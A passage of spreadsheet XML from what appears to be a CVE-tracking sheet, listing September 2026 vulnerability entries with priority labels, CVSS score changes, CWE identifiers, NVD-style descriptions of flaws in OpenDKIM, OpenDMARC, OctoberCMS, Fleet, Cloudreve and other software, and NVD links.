          <t>A vulnerability was detected in Trusted Domain Project OpenDKIM up to 2.11.0. Affected is the function dkim_qp_decode of the file util.c of the component Decoder. The manipulation results in off-by-one. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100889</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100890</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>A flaw has been found in Trusted Domain Project OpenDMARC up to 1.4.2. Affected by this vulnerability is the function opendmarc_spf_ipv6_explode in the library libopendmarc/opendmarc_spf.c of the component SPF Parser. This manipulation of the argument cp causes null pointer dereference. It is possible to initiate the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100890</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100892</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-119</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in aligungr UERANSIM up to 3.3.0. This affects the function ULInformationTransfer of the file src/gnb/rrc/handler.cpp of the component nr-gnb. Performing a manipulation of the argument dedicatedNASMessage results in memory corruption. The attack can be initiated remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100892</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100893</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in Privoce VoceChat Server up to 0.5.36. This vulnerability affects the function open_graph::fetch of the file src/api/resource.rs of the component open_graphic_parse Endpoint. Executing a manipulation of the argument url can lead to server-side request forgery. The attack can be launched remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100893</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100895</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-404, CWE-476</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in Trusted Domain Project OpenARC up to 1.0.0.Beta1. Impacted is the function arc_parse_canon_t in the library libopenarc/arc-canon.c of the component libopenarc. The manipulation results in null pointer dereference. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks. Upgrading to version 1.0.0.Beta0 is recommended to address this issue. Upgrading the affected component is advised.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100895</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100901</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in athlon1600 youtube-downloader up to 4.0.1. Affected by this vulnerability is the function stream of the file public/stream.php. The manipulation of the argument url results in server-side request forgery. It is possible to launch the attack remotely. The exploit has been made public and could be used. Commit 6ffe823 'better security for public/stream.php' only added CURLOPT_PROTOCOLS http/https restriction and MAXREDIRS cap, does not restrict destination host. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100901</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100903</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in ООО НПО Ритм GEOritm up to 2.45.1. This affects an unknown part of the file /restapi/objects/obj-groups of the component REST API. Such manipulation of the argument objectId leads to missing authentication. The attack can be launched remotely. The exploit is publicly available and might be used. Upgrading to version 2.46 is able to mitigate this issue. It is advisable to upgrade the affected component. The vendor confirms: "In August 2026, NPO Ritm received an official vulnerability notification from the Russian Federal Service for Technical and Export Control (FSTEC Russia). The vulnerability was registered under identifier BDU:2026-11235. Following our internal investigation, we confirmed the vulnerability and implemented the necessary security fixes. The vulnerability has been fixed on our hosted GEO.RITM server at geo.ritm.ru. The fix has also been included in GEO.RITM version 2.46, which is already being distributed to our customers."</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100903</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (5.3 → 5.5)</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100906</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Eyeplus 57.0.0.0308. The affected element is the function GetUsers of the file /onvif/Device of the component ONVIF. The manipulation results in information disclosure. The attack can be executed remotely. The exploit is now public and may be used.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100906</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (7.3 → 5.5)</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100909</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>5.5</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was found in OctoberCMS up to 4.1.19/4.2.25/4.3.4. The impacted element is the function getSourcePathForResize of the file modules/system/classes/ResizeImages.php. The manipulation of the argument realSourcePath results in server-side request forgery. The attack may be performed from remote. The exploit has been made public and could be used. Upgrading to version 4.3.5 and 4.4.0 is sufficient to resolve this issue. The patch is identified as 0e9736aa2c6d6bd3d60ff6ef9e0b4d32ce387f58. The affected component should be upgraded.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100909</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 5.3)</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100868</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>5.3</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-1327</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>Penpot before 2.18.0 binds the MCP server plugin WebSocket bridge to all network interfaces without authentication in single-user mode. Unauthenticated attackers on adjacent networks can connect to the WebSocket port to impersonate the Penpot browser plugin, intercept task payloads, and return forged results to the MCP client.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100868</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.5 → 5.1)</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100904</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>5.1</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>f5, php, hp</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in amirsanni mini-inventory-and-sales-management-system up to 81bf0b55f5933f3b0dbb1583204a612e06605b95. Impacted is an unknown function of the file application/controllers/Items.php of the component Items Management Module. The manipulation of the argument itemName leads to cross site scripting. Remote exploitation of the attack is possible. This product follows a rolling release approach for continuous delivery, so version details for affected or updated releases are not provided. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100904</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.1 → 2.3)</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101046</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>Fleet before 4.89.0 contains an SQL injection vulnerability in the activity list endpoints (GET /api/v1/fleet/activities and GET /api/v1/fleet/hosts/{id}/activities). The deprecated cursor-pagination helper appendListOptionsWithCursorToSQL interpolated the caller-supplied sort/order key into the SQL ORDER BY clause without an allowlist, so an authenticated user with read access to Activity could order results by arbitrary columns. The impact is read-only and bounded to columns on the activity_past table that are not otherwise returned in these responses (e.g. details), allowing their values to be inferred through the resulting sort order; there is no write access, privilege escalation, or reachability of node_key or other host-join columns through these endpoints. Fixed in 4.89.0, which removes the deprecated helper and passes the sort column through SanitizeColumn.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101046</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.1 → 2.3)</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101051</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>Cloudreve before 4.16.1 fails to properly sanitize file paths returned by remote downloaders, allowing authenticated users to create files outside the selected destination directory. Attackers can exploit path traversal sequences in downloader metadata to write files to unexpected locations within accessible namespaces.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101051</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (3.1 → 2.3)</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101089</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Nezha before 2.2.7 contains an information disclosure vulnerability in the GET /api/v1/profile endpoint that returns the bcrypt-hashed password field of authenticated users. Attackers can extract password hashes and perform offline cracking attacks without rate limiting or audit trail constraints.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101089</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (4.3 → 2.1)</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100877</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <t>CWE-79, CWE-94</t>
        </is>
      </c>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in mathurvishal CloudClassroom-PHP-Project up to 5dadec098bfbbf3300d60c3494db3fb95b66e7be. Affected by this vulnerability is an unknown functionality of the file registrationform.php. Executing a manipulation of the argument FName/LName/Addrs can lead to cross site scripting. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T45" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100877</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>Updated - CVSS changed (6.3 → 2.1)</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100878</t>
        </is>
      </c>
      <c r="D46" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E46" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F46" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr">
        <is>
          <t>suse</t>
        </is>
      </c>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr"/>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-27</t>
        </is>
      </c>
